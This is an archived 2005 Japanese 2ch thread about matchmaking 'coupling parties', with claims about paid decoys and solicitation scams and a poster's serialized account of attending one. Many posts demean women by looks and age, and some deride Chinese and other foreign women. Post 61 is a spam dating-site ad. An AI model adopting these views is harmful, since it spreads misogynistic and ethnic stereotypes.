5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

カップリングパーティにいざ出陣

1 :大人の名無しさん:2005/04/09(土) 13:23:04 ID:DnN9Zu6m
32歳童貞、何としても彼女がほしい


2 :大人の名無しさん:2005/04/09(土) 13:26:34 ID:GgoJpk+w
いってら

3 :大人の名無しさん:2005/04/09(土) 13:53:40 ID:38L50UXf
がんばれ

4 :大人の名無しさん:2005/04/09(土) 14:20:36 ID:U4FasFTI
おまえサラサラサーファーガール
おいらテカテカロックンローラー

5 :仏猫 ◆m3EEvAdKrk :2005/04/09(土) 16:43:29 ID:ame9ezzY
糸冬 了

6 :大人の名無しさん:2005/04/09(土) 16:46:37 ID:NmcDJ5/8
>>1
今日はどちらのパーティに行かれるのですか?

7 :大人の名無しさん:2005/04/10(日) 16:01:40 ID:86Ny/S/t
俺は以前スタッフとしてバイトしたことがあるんで
行きたいとは思えない。ww
本気で相手探しに行ってるんならお勧めはしない。

8 :大人の名無しさん:2005/04/10(日) 16:04:51 ID:DckdJQUw
おい
お前彼女が仮にできたとしてもデート代も稼げないような
バカ男じゃないだろうな?!
即効振られるぜ。
まぁ頑張れよ

9 :大人の名無しさん:2005/04/10(日) 16:07:19 ID:8zlsVp49
>>7
さくらが多いってこと?

10 :大人の名無しさん:2005/04/10(日) 16:13:58 ID:qBM5ywWI
お見合いパーティなんてサクラがほとんどだよ。ましてや美人だったらサクラ確定!

11 :大人の名無しさん:2005/04/10(日) 19:10:15 ID:klw+IZPo
>>1
最近、パーティに増えてきた厨獄人には気をつけてね
大抵は詐欺だから

12 :大人の名無しさん:2005/04/10(日) 19:20:03 ID:qBM5ywWI
美人はもちろん喪女もサクラがいるから悪質。

13 :大人の名無しさん:2005/04/10(日) 19:46:46 ID:rZLMDB91
高い宝石とか買わされるやつか

14 :大人の名無しさん:2005/04/10(日) 20:15:32 ID:qBM5ywWI
確かに勧誘は多い!物品販売に宗教勧誘!

15 :大人の名無しさん:2005/04/10(日) 21:13:57 ID:G/dpX5Ws
行ったことあるの?

16 :大人の名無しさん:2005/04/11(月) 04:30:02 ID:O9RsDWXR
勧誘はないけど、その日になって出席予定の女が少ないと知ってる女に声かけて
出てもらったりしてなんとか人数合わせしたりするよ。大体常連さんは男女とも
いるし。

17 :大人の名無しさん:2005/04/11(月) 07:59:08 ID:Cbs4FsiX
同業他社が参加し『ここはサクラやヤラセや勧誘多いよ』なんて嫌がらせを防止するために、男女参加者共にパーティ主催者関係者が必ず紛れ込んでいます!

18 :大人の名無しさん:2005/04/11(月) 16:23:40 ID:eYhOWUl7
ヤリ目的とかサクラの男を見分ける方法ってあるんでしょうか・・

19 :大人の名無しさん:2005/04/11(月) 19:34:42 ID:Cbs4FsiX
というか男性は基本的に参加者全員ヤリ目的です(^ε^)-☆Chu!!そんなヤリ目的な男性を結婚したいと思わせたいのなら、貴女自身が魅力的になる事です。それが容姿であったら実家の資産だったり貴女自身の年収だったりベットテクニックだったり!

20 :大人の名無しさん:2005/04/11(月) 20:48:42 ID:RH/x5Ruq
行ってみたい気もするが女のレベルが低そうだしな。売れ残りのデブスしかいねえんじゃねえか

21 :大人の名無しさん:2005/04/11(月) 21:11:30 ID:2IE92gvG
>>20
それとそこそこ綺麗なサクラか。
それでも1度は行ってみたいなぁ。
でも37歳じゃ医者限定とかしかなさそう・・・・・・・既婚だし


22 :大人の名無しさん:2005/04/11(月) 21:24:59 ID:38AwxZxX
>>1 (老婆心ながら)
サクラにひやかされ、ジ・エンドならまだいい。
いちばんこわいのは、そこにまぎれこんでる「美人局」だ。

本気で「その手」ででお相手さがすつもりなら、
まず何より
容姿でのえり好みはやめるべし。

(考えてみ。容姿に恵まれ、男にモテる女性がわざわざ本気で相手探しにそんなとこに来ると思う?)

23 :大人の名無しさん:2005/04/11(月) 21:54:34 ID:38AwxZxX
あげ

24 :大人の名無しさん:2005/04/11(月) 21:55:50 ID:Cbs4FsiX
というかお見合いパーティーに参加してる女で、サクラって思えるような魅力的な容姿の女は皆無です。楽して美女ゲット出来るほど世の中甘くありません

25 :大人の名無しさん:2005/04/11(月) 22:41:03 ID:38AwxZxX
楽して(外見だけでも)美女を得たいなら??

国籍で妥協せよ。
ゲット「そのもの」は楽でも、結ばれた後に発生する「それ相応の」デメリットは
覚悟せよ。

26 :大人の名無しさん:2005/04/12(火) 00:12:44 ID:QrH0hAQX
男28人中12人から第一印象一番人気をもらった人がいるんだけど
その人それほど美人じゃないんだよね
人間的な魅力なんだろうか?
それともやっぱり男性からみたら美人なんだろうか
ちなみに彼女はEカップなんだけど

27 :大人の名無しさん:2005/04/12(火) 06:14:28 ID:2j2nftNg
お見合いパーティーで容姿がたいした事ないのに圧倒的一番人気になる人は主催者が用意したサクラ!参加異性全員に愛嬌ふるまい、ほぼ全員に印象度を高く記入するから!美人美男以外はサクラでないなんて考えるのは甘い!

28 :大人の名無しさん:2005/04/12(火) 07:33:50 ID:NA6m7/3C
男のほうの(年齢、年収、学歴などの)条件がゆるい場合、
そこにやってくる美人はまず間違いなく以下のいずれかだろう。
1.ひやかし
2.主催者サイドの桜
3.(最終目的)怪しげな勧誘
4.美人局

ここに本気でやってくるオンナは、まず
売れ残りのデ*スばかり
まあ、2.3.4.女たちにとっては、いい引き立て役になってくれるわけで・・・

29 :大人の名無しさん:2005/04/12(火) 15:08:39 ID:qyXcTnjQ
>>19 全員ヤリ目的・・
怖くて参加できない・・

30 :大人の名無しさん:2005/04/12(火) 16:16:15 ID:2j2nftNg
お見合いパーティにそこそこ可愛い子や美人が参加したら主催者が食べようとするからカップルになってるのにカップルにしないなんてイカサマされる

31 :大人の名無しさん:2005/04/12(火) 16:18:02 ID:2j2nftNg
参加した事ある知人女性がいますが、主催者から個人的にしつこくデートに誘われたらしい!完全にルール違反だわ

32 :大人の名無しさん:2005/04/12(火) 19:20:42 ID:Eq80qOU/
スーツ着てけばいいの?

33 :大人の名無しさん:2005/04/12(火) 20:53:51 ID:2j2nftNg
スーツ着用のパーティの方が堅実なパーティー会社でしょうね。医師限定パーティーなのに医師でない人が参加してます。大教大付小の立間もそうでした。身分照会がいいかげん。

34 :大人の名無しさん:2005/04/12(火) 21:09:07 ID:NA6m7/3C
>>1よ。
これでよく分かったろう?

ぶっちゃけた話、(己のスペックでハンデ背負っていて)
「この手」で相手を探そう思うなら、
「モンスターレベルのデブスババア」でもいい!(現実それでもムズイカモ)

それ位の覚悟ででなければ、
金の無駄!
時間の無駄!


35 :大人の名無しさん:2005/04/12(火) 23:44:12 ID:uFO753y6
ここにやって来るゲストの男たち
「主催者達のいい金ずる」

ここにやってくるゲストの女たち
そこそこ美人以上「主催者達に利用される新しい
桜候補、じつは主催者達に狙われている」
ブス「単なる引き立て役」

36 :大人の名無しさん:2005/04/13(水) 13:20:04 ID:IeU1PKHP
サクラ女をお持ち帰りしたことあるが。帰り際に飲みに誘ったら
簡単に釣れたよ。w

37 :大人の名無しさん:2005/04/13(水) 13:47:14 ID:ZkstMDBq
サクラは自分自身の事をサクラなんて言わない!

38 :大人の名無しさん:2005/04/13(水) 19:13:59 ID:GuGLKMrQ
この際デブスでもいい
マソコがついてればいい

39 :大人の名無しさん:2005/04/13(水) 22:55:21 ID:ZkstMDBq
お見合いパーティーで美人ゲットは無理だという事をお見合いパーティー参加すれイヤて言うくらい思い知らされるが、だからと言って平均やデブスに求愛しても女はOKしない!理由はあくまで自分の理想を追い求めて何度も懲りずに参加するから

40 :大人の名無しさん:2005/04/14(木) 00:21:29 ID:fGA7kMO0
一番人気になる人は妥協しないで
本当に気に入った人だけを選ぶんだろうね

41 :大人の名無しさん:2005/04/14(木) 01:45:03 ID:+7jsuhGe
一番人気だろうが最低人気だろうが女は己を高く売ろうとしてる!だから不細工狙いでも玉砕するのである!美女がカップルになるのはサクラでありヤラセ!お見合いパーティーなんて集団詐欺だわね

42 :大人の名無しさん:2005/04/14(木) 07:41:51 ID:gf1D8Vmw
>>1よ。
もはや「国内」では勝負にならんのだよ。><
「海外」に目を向けようではないか。
(それも我が国より圧倒的に経済格差の低い国)

「日本人男」というだけで「カネモチネー」とすりよってくる異国のオナゴ

さしたるスペックもなくて、
何がなんでも「カノジョ」ほしいなら、
現実、もうこれしか手の届く選択肢は残されてないだろう。
(歯がゆく不本意でも、それが現実だろ?)

43 :大人の名無しさん:2005/04/14(木) 19:20:02 ID:gf1D8Vmw
あげ

44 :大人の名無しさん:2005/04/14(木) 20:23:06 ID:+7jsuhGe
美人に相手にされないのは当然として、妥協して不細工狙いでも玉砕する理由は、人間って己が醜ければ醜いほど美を求めるから!不細工女ほどイケメン狙いなのだ!美人はイケメンな金持ち狙いなのだ…

45 :大人の名無しさん:2005/04/14(木) 20:42:06 ID:5/QtWfuz
要するに女は…

46 :大人の名無しさん:2005/04/14(木) 20:51:02 ID:QdAGcyyB
要するに女は・・・

47 :大人の名無しさん:2005/04/14(木) 21:34:40 ID:fEmhyU+e
正直者ってことでFA

48 :大人の名無しさん:2005/04/14(木) 21:35:50 ID:fEmhyU+e
なんで外国妻いやなの?
日本人男モテモテじゃない。
うらやましいなぁ〜

49 :大人の名無しさん:2005/04/16(土) 12:33:28 ID:lI6hxWT7
あげ

50 :大人の名無しさん:2005/04/16(土) 14:42:28 ID:owvtDDSr
カップリングパーティの魅力的な異性→サクラ・物品販売・宗教勧誘の人達であり、参加するだけ無駄

51 :大人の名無しさん:2005/04/16(土) 15:16:54 ID:jrQgAHnu
>>50 そう思ってるなら行かなけりゃいいんじゃないの?

52 :大人の名無しさん:2005/04/16(土) 21:19:17 ID:8RaHvdIh
中国人がいた

53 :大人の名無しさん:2005/04/16(土) 22:55:09 ID:wbJ4UcMZ
サクラがいる(多いか少ないか)かどうかは、会社にもよると思う。

ただ一つの事実はもてる香具師はどこ行ってももてるし、もてない香具師はどこ行って
ももてないということ。平均レベルの香具師は、自分と同じレベルであれば頑張ればど
うにかなるよ。しかし、外見が明白に自分以上の相手をパーティでゲットするのは無理くさい・・


54 :大人の名無しさん:2005/04/17(日) 02:25:33 ID:8Xta6LRn
サクラを口説けばいいと思うのだが。
サクラだと思ってテンション下がった時点でダメだよ。
これがダメなら「キャバクラ」くらいの考えでね。

55 :大人の名無しさん:2005/04/17(日) 17:02:25 ID:tIfSi5lO
男性の参加費って大体キャバの1セットくらいだからww
最初からキャバいったほうが楽しいしかわいいコがいるよ。


56 :大人の名無しさん:2005/04/17(日) 20:22:09 ID:NOf+UpX2

■年齢     歳
■学歴        
■年収     万
■貯金     万
■手取り 万
■借金 万
■業種
■居住地
■所有不動産
■勤続年数
■性別
■資格

57 :大人の名無しさん:2005/04/17(日) 20:38:20 ID:GHJvxNY0
友達はこのてのパーティで彼氏見つけたし、まあ、
結婚で必要なのは容姿じゃないから、がんばってください。

58 :大人の名無しさん:2005/04/17(日) 20:58:19 ID:HJ7RKkEU
サクラも人間だから口説けるとか、キャバ行く方がマシとの意見が出てるが、俺から言わせたらサクラするような人間性は大嫌いだし、キャバも同様!お見合いパーティで魅力的な異性を見つけようなんて考えは甘い!楽して得れる物事は所詮しれてます。

59 :大人の名無しさん:2005/04/17(日) 21:15:22 ID:ihxs/KRW
>>58
なにをもって魅力的とするかにもよる。

60 :大人の名無しさん:2005/04/18(月) 03:27:40 ID:YMKVIrRZ
魅力…まずは容姿。勿論整形は不可!外見あっての中身だな!

61 :EL Dorado:2005/04/18(月) 04:00:49 ID:OvC0da68
 “EL Doradoは、素敵な出会いと幸せがあります”
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
会員制交際支援サイト「EL Dorado」のオープ企画のご案内。
EL Doradoは、健全な交際の場を共有する事を目的として、運営される
会員制の交際支援サイトです。
男性会員は、社会的に地位と高収入の約束された方ばかりです。
女性会員は、素晴らしい女性の方々ばかりです。
―――――――――――――――――――――――――――――――
□男性会員 ◇入会金  40%割引中!     *2005年5月末まで
□女性会員 ◇入会金  無料入会受付中!  *先着50名様限り
―――――――――――――――――――――――――――――――
□主な男性会員の資格
 ◇年齢  22歳以上、50歳未満。
 ◇職業  医師、弁護士、司法関係者、公務員、上場企業勤務の方など。
□女性会員の資格
 ◇年齢  18歳以上、50歳未満。
―――――――――――――――――――――――――――――――
□ご利用できる主なアイテム
 ◇Open Chat-Room・・・会員の皆さんが利用するチャット・ルームです。
 ◇Guest Chat-Room(個人専用)・・・会員個人専用です。
 ◇Guest Bbs(個人専用告知板)・・・会員個人専用です。
 ◇Guest 私書箱・・・会員同士の連絡用です。 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
※ 当会に相応しくない方及び業界間のブラックリストに載っている方に
つきましては、入会をお断りさせていただきますので、ご了承ください。
━━━━━━━━━━━━━━━━━━━━━━━━━
┏━━┓ 会員制交際支援サイト  EL Dorado
┃\/┃E-mail: eldorado@japannetnavi.com
┗━━┛http://japannetnavi.com/el-dorado/
━━━━━━━━━━━━━━━━━━━━━━━━━

62 :大人の名無しさん:2005/04/18(月) 20:46:23 ID:uKwhhZcP
さくらなんかくどいたってな

63 :大人の名無しさん:2005/04/18(月) 21:28:00 ID:/0o718ct
失望すると分かっているのに人はなぜパーティーに行くのだろう

64 :大人の名無しさん:2005/04/18(月) 22:09:33 ID:mv40Evz+
痛い目にあっても、
「いや、次こそは希望がある!」
と盲信してしまい、ループにはまる。
しかし、それは主催者たちを肥え太らせるのみ。

こうなってしまったら、現実、潔く結婚諦めるか、
いわゆる「国際結婚」を考えるか、
このどっちかしかないだろう。

65 :大人の名無しさん:2005/04/19(火) 13:41:05 ID:dBsu8kuV
さくらかわいいじゃん
さくらくどけばいいじゃんか
さくらを本気にさせてみればいーじゃん
根性なしが

66 :大人の名無しさん:2005/04/19(火) 16:09:38 ID:im1Py8+3
>>65 それが出来りゃ苦労しないだろうが

67 :大人の名無しさん:2005/04/19(火) 16:14:30 ID:dBsu8kuV
どーんとアタックしろよ
パーティの途中でメールアドレスとかゲットできないのか?
名刺交換とかさ!

68 :大人の名無しさん:2005/04/19(火) 21:37:52 ID:boyZ/Zs6
今、あんな暴動が起きてる頃だから「チャイナ女」は値崩れしてることだろう。

「低努力で美女を得たい」なら一考の「価値?」はあるかもね。

ただし、それ相応のデメリットは覚悟しなければならないが・・・

69 :大人の名無しさん:2005/04/20(水) 00:06:59 ID:li6XLiwk
ブスしかいなとかさ、てめーの面見て文句言えってんだよ!
お互い様だろうが

70 :大人の名無しさん:2005/04/21(木) 04:20:42 ID:virCOlR8
サクラが人妻だったりしますよ

71 :大人の名無しさん:2005/04/22(金) 06:48:11 ID:JWjaHmcE
お見合いパーティー主催者=お見合いパーティー会場飲食店=流行りのクラブを経営らしい!美男美女のサクラ調達は飲食店従業員やその友人、クラブの常連イケメン・美女やその友人を調達らしい!まさに集団詐欺!

72 :大人の名無しさん:2005/04/22(金) 20:51:34 ID:MYSHEXzx
【にちゃん名物キモオタの特徴】
.とにかく激しい自己中。(皆がどんなに苦労していても自分さえ楽できれば問題なし)
.どんなに自分に非があってもいかなる時でも自分を正当化するのに必死になる。
.自分と少しでも異なる意見をもつ人は激しく攻撃するかバカにする。
.少しでもお洒落をしている人は全てDQNと脳内変換する。
.リアルの女性といえば幼女と小学生が一番だと思い込みそれが激しさを増すと
  たまに犯罪を犯す。
.アニメのかわいい女子高生は大好きだが現実の女子高生とは怖くてしゃべれない。
.茶髪などを極度に嫌う。
.オタ臭がすごい。風呂にあまり入らない奴も多い。夏はもちろんのこと冬でも汗臭い。
.仲間内だとやかましく騒ぐのに他の人の前では返事の挨拶すらしない。
.携帯の登録者数は5件未満。
.日頃は消極的なのに同人誌即売会などになると急に積極的になる。
.人の不幸を自分の糧とする。
.人の手柄を自分の手柄にする。
.挙動不審で常にプルプル震えてる。

73 :大人の名無しさん:2005/04/23(土) 19:53:40 ID:R/j/NCIE
お見合いパーティーに参加しただけで、知らない携帯番号から変な勧誘電話がありました

74 :大人の名無しさん:2005/04/25(月) 00:41:23 ID:qQFJRpED
今日、行ってきた。
かわいい子が多かったけど、どうなんだろう?

明日、メールしてみよう。


75 :大人の名無しさん:2005/04/25(月) 02:34:24 ID:YMbBZULv
お見合いパーティー会社のサクラはありとあらゆるパーティー会社のパーティーでサクラをする。つまらサクラ派遣会社があり、なるべく毎回違う女性を参加させる。いつ参加しても魅力的な異性は同じ人ってパターンを避けるため

76 :大人の名無しさん:2005/04/26(火) 20:37:50 ID:oJMcD0NO
ババア多すぎ

77 :大人の名無しさん:2005/04/26(火) 21:50:34 ID:RVtFcL0g
ババァが来てもいいがもう少し愛想よくしろ
苦虫噛みつぶしたような顔しやがって

78 :大人の名無しさん:2005/04/27(水) 04:16:33 ID:Q8hlxhNO
30代以上限定のお見合いパーティーなんて、容姿レベル最悪で、よくぞここまで不細工集まったなぁ〜って感じ。マシな容姿はサクラ

79 :大人の名無しさん:2005/04/27(水) 04:17:04 ID:nBjL5lP4
俺「出でよシェンロン!!!」

ゴゴゴゴゴゴ・・・・

シェンロン「おいすー^^」

俺「年上で小柄でとってもかわいくて、
  しっかり物のお姉さんタイプなんだけどどこかちょっと抜けてて、
  それを俺がフォローするたびに『もー。私の方が年上なんだからね!』
  とかお姉さんぶってしかも甘えさせてくれるそんな彼女が欲しい!!!!!」

シェンロン「>年上で まで読んだ」


そして運ばれてくる細木数子

俺「ちょ、おまwwwwwwwwwwwwwwwww」


80 :大人の名無しさん:2005/04/28(木) 20:50:19 ID:YQXfXj88
もうええわ

81 :大人の名無しさん:2005/04/28(木) 22:27:29 ID:uoKeInnT
カップリングパーティ必勝法←あんまり参考にならない
http://computers.net4free.org/with/AHhC.htm

82 :大人の名無しさん:2005/04/29(金) 08:45:14 ID:hFiduKPS
撃沈

83 :新規参入:2005/04/29(金) 23:49:31 ID:kQY2R/nI
3連敗!まだまだこれから!

84 :大人の名無しさん:2005/04/30(土) 00:08:21 ID:e7JQUs6b
お互い始めて行って見初めあって
結婚にゴールインなんてどのくらいの確立ですかね?

85 :大人の名無しさん:2005/04/30(土) 00:16:33 ID:bXpsfpVZ
列車事故が起きるより低い確率

86 :大人の名無しさん:2005/04/30(土) 09:28:00 ID:CxdSaUcO
んなこたない

87 :大人の名無しさん:2005/04/30(土) 11:05:37 ID:w/tClbQ6
さすがタモさんの突っ込みは切れがあるな

88 :大人の名無しさん:2005/04/30(土) 11:33:38 ID:hvlASuIf
かならず余裕のイケメン君がいて、少数の美女をさらっていく。
おまえはこんでもよろしい。

89 :84:2005/04/30(土) 13:01:36 ID:Xl47riAV
馬鹿みたいだけどそんな事が起こるかもしれないと思っている。
もしいい方向に進んだら
???分の1の確立の事がありましたよ と報告するよ

90 :大人の名無しさん:2005/04/30(土) 13:06:31 ID:44smc209
過去3人と初日にセックス
3人とも妊娠→中絶
もう金無いよ…
おまいら受精し過ぎ

91 :大人の名無しさん:2005/04/30(土) 13:16:36 ID:Zttn3eIE
避妊しろよw

92 :大人の名無しさん:2005/04/30(土) 14:51:13 ID:af6wFFw2
>>90
それ、ないない(生理が)詐欺じゃないのか?

うまいな、俺

93 :西郷:2005/04/30(土) 21:53:43 ID:xUNzchTj
あーーーーーーーーーー。
行って来た。カップリングパーティーとかいうやつに。
撃沈だよ。撃沈。
なんか俺ってやっぱ駄目なんだな、とつくづく思うた。
だいたい、はじめましての状態で俺のよさが分かってたまるか。
あーーーーーーーーー。むなしい。

94 :大人の名無しさん:2005/04/30(土) 21:57:35 ID:af6wFFw2
>>93

くわしく

95 :西郷:2005/04/30(土) 22:01:31 ID:xUNzchTj
はじめてのカップリングなんでドキドキして行ったさ。
何十人もいるとかいうふれこみなのに
時間ぎりぎりに行って俺以外に男女一人ずつ。
はぁ?
時間守れない奴は嫌いなんだよな、とか考えながら時間が過ぎる。
結局、男5女5でカップリングスタート。
なぜに、綺麗に同じ人数になるのかな?
とか疑問に思うもけっこう可愛いのでドキドキ。
司会のイケメン男がへたくそなしゃべりで始まったよ。
わぁ、これがカップリングなのか?(つづく)

96 :大人の名無しさん:2005/04/30(土) 22:04:27 ID:af6wFFw2
>>95
ふんふん、
5対5、少ないんじゃないの?
そんなもん?


97 :大人の名無しさん:2005/04/30(土) 22:05:41 ID:R002XS4f
>>95
続きまだぁ?

98 :西郷:2005/04/30(土) 22:12:16 ID:xUNzchTj
はじめてのカップリングなんで要領が分からない。
イケメン司会の説明がこりゃまた分からん。
俺が馬鹿なのか?イケメンが馬鹿なのか?
そうこうするうちに、スタート。
ぐるりと回って女の子とご対面。
一対一で自己紹介タイーーム!!
一人目の女の子はちょっときつめの嘉門洋子。
俺好みのいい女やんけ。
緊張してうまく喋れない。何喋っていいのかな?
嘉門洋子にどうすればいいのか、聞いたりする。
向こうは常連なのか? イケメン司会の説明を理解している、、、
そうこうするうちに、エンド。
次の女の子とのトークタイムだ。(つづく)

99 :大人の名無しさん:2005/04/30(土) 22:21:14 ID:F8Bnbc2o
西郷 その話長くなるのか?

100 :西郷:2005/04/30(土) 22:21:40 ID:xUNzchTj
次のおなごはなんと俺の一番大好きな松たかこを細身にした感じ。
いいぞ!!いいぞ!!し・あ・わ・せ。
しかも歯医者さんの助手だとか。
すんばらしい!!
しかし、俺はトークが下手なんだよな。
俺のこの心のときめきを伝えられない。
ちきしょう、、、、練習が必要だったな。
後悔先に立たずとは俺のことだ。
ただ、あまりの可愛さにまんぞく、まんぞく。
しかーし、楽しい時間はすぐに終わってしまうんだな。
がっくり。
さてさて、三人目のご対面。(つづく)

101 :大人の名無しさん:2005/04/30(土) 22:24:09 ID:qszI82ph
明日結婚式呼ばれてるので行きます。
ついでにパーティ行こうかなぁ。
まぁ撃沈だろうけどw

102 :大人の名無しさん:2005/04/30(土) 22:29:23 ID:yHyZY+m8
西郷どんナイス

103 :西郷:2005/04/30(土) 22:30:39 ID:xUNzchTj
三人目は今をときめく市川由衣嬢。
やっと要領をつかんできた俺。
俺は昔から学習能力は高いからな。
慣れれば、直線一気さ。
けっこう会話弾んだやないけ。
いいぞ。俺!!
次は場所を変えて四人目のおなごだ。(つづく)

104 :大人の名無しさん:2005/04/30(土) 22:31:55 ID:yHyZY+m8
美女ぞろいかよ!!

105 :大人の名無しさん:2005/04/30(土) 22:37:07 ID:af6wFFw2
今んとこ日本で一番充実した1日を過ごしてますな>西郷

106 :西郷:2005/04/30(土) 22:37:55 ID:xUNzchTj
四人目はナイス・バディーーーーーー。オン・ゴーーーーーーール!!
その名は安めぐみ嬢。めぐみ嬢の胸に俺の心は釘付けさ。
温泉が好きだとか。むふふ。
僕も君と温泉にいきたーーーーーーーーーーーい。
君はどんなおっぱいしてるのかな。
君はどんなお尻してるのかな。
安めぐみ嬢の話はほとんど上の空。
妄想は果てしなく続く。
残念ながら、ここもジ・エンド。
楽しい時間は過ぎるのが速いなぁ。
さてさて最後のおなごは?(つづく)

107 :大人の名無しさん:2005/04/30(土) 22:41:24 ID:F8Bnbc2o
西郷 お前が行ってきたのはたぶんキャバクラって所だと思う

108 :西郷:2005/04/30(土) 22:44:12 ID:xUNzchTj
最後のおなごは? 
キターーーーーーーーーーーーーーー、、、、
超ドブス。
君は眉毛の国からやってきた眉子さんかな?
せっかっくの盛り上がりも、ここで終わりか、、、
でも、自己紹介タイムは平等にあるらしい。
眉子さんとも同じ時間喋らないといけないのか?
最初の場所取りが悪かったな。
1番最初の要領をえない時間に眉子さんを当てるべきだった。
作戦ミスだぁ。
ここで自己紹介タイムはおわた。
次はファーストインプレッションタイムだ!!(つづく)

109 :西郷:2005/04/30(土) 22:50:58 ID:xUNzchTj
ここでカップリングに無知な君たちに解説しよう。
もう僕はベテランだからね。一回だけど。
ファーストインプレッションタイムとは
自己紹介タイムで気に入った人を書くお時間。
一番お気に入りの子を1番の欄に書く。
通常はたくさんの人がいるから5人まで書くみたいだけど
今日は人が少ないからいい娘だと思う子を記入してくださいとのこと。
どうしようかな?
ここが一番の勝負どころかもしれない。
じっくり作戦を考えなきゃいけない時間だ。
関が原の合戦ってとこだな。
どうしよう。
安めぐみ嬢のおっぱいも捨てがたいし
嘉門洋子も色っぽいしな。(つづく)

110 :大人の名無しさん:2005/04/30(土) 22:51:25 ID:R002XS4f
眉子以外はサクラだと思う

111 :大人の名無しさん:2005/04/30(土) 22:53:27 ID:qszI82ph
サクラ大杉だなw

112 :西郷:2005/04/30(土) 22:59:10 ID:xUNzchTj
いろいろと妄想は膨らむ。
時間は無い。俺の頭はフル回転だ。
安めぐみ嬢と付き合ったら、毎日揉み揉みコースじゃないか?
おっぱいでお腹いっぱいになるぞ。
嘉門洋子ともやってみたいな。
けっこういい体してるぞ、きっと。
悩みに悩んだあげく。
俺は欲張りにも四人の名前を
ファーストインプレッションシートに書き込んだのだ。(つづく)

113 :大人の名無しさん:2005/04/30(土) 23:11:06 ID:af6wFFw2
おっぱいで腹いっぱい!
いいぞー!

114 :大人の名無しさん:2005/04/30(土) 23:13:42 ID:fZwWND+H
西郷どん、楽しませてもらっておいてなんだが、今日中に落ちまで頼む

115 :西郷:2005/04/30(土) 23:21:20 ID:xUNzchTj
俺は慎重にファーストインプレッションシートに番号を書き込んだ。
解説しとかなきゃいけないな。
カップリングでは一人ひとり番号が与えられていて
番号で把握するわけだ。
俺はBEST好印象の欄に、松たかこ。
準優勝に安めぐみ嬢。銅メダルに嘉門洋子。
ベスト4に市川由衣嬢の番号を記入した。
もうこうなったら4人と付き合うしかないな。
恐る恐るシートをイケメン司会者に渡すと
その後、10分間の休憩タイムに入った。
休憩タイムでは、お好みの飲み物が飲めるらしい。
俺は、皆がどういう行動に出るか詳細に観察しつつ
飲み物は最後に注文した。(つづく)


116 :大人の名無しさん:2005/04/30(土) 23:22:47 ID:af6wFFw2
うわ、続気が気になるが
それよりも眠い・・・・・・・
明日か〜残念

117 :西郷:2005/04/30(土) 23:26:59 ID:xUNzchTj
休憩タイムでは、みな作戦を考えているのだろう。
誰とも喋らない。
女の子とは喋ってはいけないようだ。
女の子は皆、ウーロン茶を頼む中、嘉門洋子は
一人白ワインを頼んでいる。
嘉門洋子はけっこういけるな。
俺はひっそりビールを注文した。
酔わないと自分自身が出せないシャイな男なんだよ、俺は。
短い休憩時間が終わると
ファーストインプレッション集計シートが配られた。(つづく)

118 :西郷:2005/04/30(土) 23:32:22 ID:xUNzchTj
ここでファーストインプレッション集計シートを解説しておこう。
ファーストインプレッション集計シートとは、
皆が書き込んだファーストインプレッションシートの
結果を集計したものだ。
そのまんまだな(笑)
そこには、番号が書かれていて
BEST好印象には、ブルーのマーカーが、
好印象として書き込まれた人の番号には、
ピンクのマーカーが塗られている。
キターーーーーーーーーーーー。(つづく)

119 :大人の名無しさん:2005/04/30(土) 23:35:00 ID:qszI82ph
まだ書いてたのか乙

120 :西郷:2005/04/30(土) 23:39:40 ID:xUNzchTj
なんと、西郷の集計シートには
4つのマーカーが塗られているではないか。
松たかこの番号にも嘉門洋子の番号にも
安めぐみ嬢の番号にも市川由衣嬢の番号にも
ピンクのマーカーが塗られている。
塗られていないのは、眉子さんだけ。
眉子さん、君は眼中にないからいいんだよ(笑)
俺にもとうとうサンタクロースがやってきたんだな。
みな、俺に好印象をもっているんだ!!
いいぞ!!いいぞ!!
次はフリータイムのお時間だ。(つづく)

121 :大人の名無しさん:2005/04/30(土) 23:44:59 ID:ALCVgOdq
ピンクは何人も選べるんだよね。

青が本命、一人だけしか選べない。

122 :大人の名無しさん:2005/04/30(土) 23:57:28 ID:slTgWnue
西郷さん乙です。
どちらのパーティに参加されたのか教えてほしいです。

123 :大人の名無しさん:2005/05/01(日) 00:50:26 ID:4NDDJ/vR
24歳の子とカプールになってしまった。
会話続くかな。

124 :大人の名無しさん:2005/05/01(日) 10:11:37 ID:2B8ji3ZF
あれ?続きあまり書いてないのか
西郷、男の参加者についても頼むよ!

125 :大人の名無しさん:2005/05/01(日) 11:34:12 ID:M8swREPx
ていうか西郷さんはおっぱいが、妄想が、と言ってる時点で、ケコンから程遠いと思われw

126 :西郷:2005/05/01(日) 12:45:30 ID:CG0BP780
おっはー。
今起きたよ。寝る子は育つってか?

127 :大人の名無しさん:2005/05/01(日) 14:12:00 ID:AotPS9Gn
西郷うぜぇ氏ね

128 :西郷:2005/05/01(日) 14:15:33 ID:CG0BP780
>>127
飯食ってこれから続き書こうとおもたら
なんだ? ショボン

129 :大人の名無しさん:2005/05/01(日) 14:26:01 ID:00XjA5uz
結論だけ書いたらええがな

130 :大人の名無しさん:2005/05/01(日) 15:15:22 ID:iCP9JXKD
西郷、煽られようが何しようが書け。どうせさびれスレだからウザイも何も関係ねぇ
でも、できたら夜にしてくれ。これから遊びに行って来る。

131 :大人の名無しさん:2005/05/01(日) 16:50:57 ID:eBEvtGrj
>>129に胴衣。結論だけ書け。うざいから。


132 :大人の名無しさん:2005/05/01(日) 19:15:22 ID:jVd0CXsi
西郷さん、是非続きをお願いします


133 :大人の名無しさん:2005/05/01(日) 20:00:43 ID:IT/APrDw
息子・娘に代わって親同士がまず見合い
http://headline.2ch.net/test/read.cgi/bbynews/1114944072/

[二軍]【話題】息子・娘の代わりに親同士のお見合いが人気
http://headline.2ch.net/test/read.cgi/bbynews/1114936510/

福岡でも、おかんやってくれ!他力本願

134 :大人の名無しさん:2005/05/01(日) 20:18:12 ID:2B8ji3ZF
さ、うざくなんかないから続き頼むよ!西郷

135 :大人の名無しさん:2005/05/02(月) 19:44:51 ID:hY9c4dOH
最後まで書け、西郷よ

136 :大人の名無しさん:2005/05/02(月) 22:44:03 ID:/qOPD3Dd
がんばれよ本郷

137 :大人の名無しさん:2005/05/02(月) 23:10:47 ID:Gjoy+sAd
忘れ物だよ東郷

138 :大人の名無しさん:2005/05/03(火) 19:13:05 ID:sRd1CWZO
西郷さんかいてよーー
長くてもいいから!!

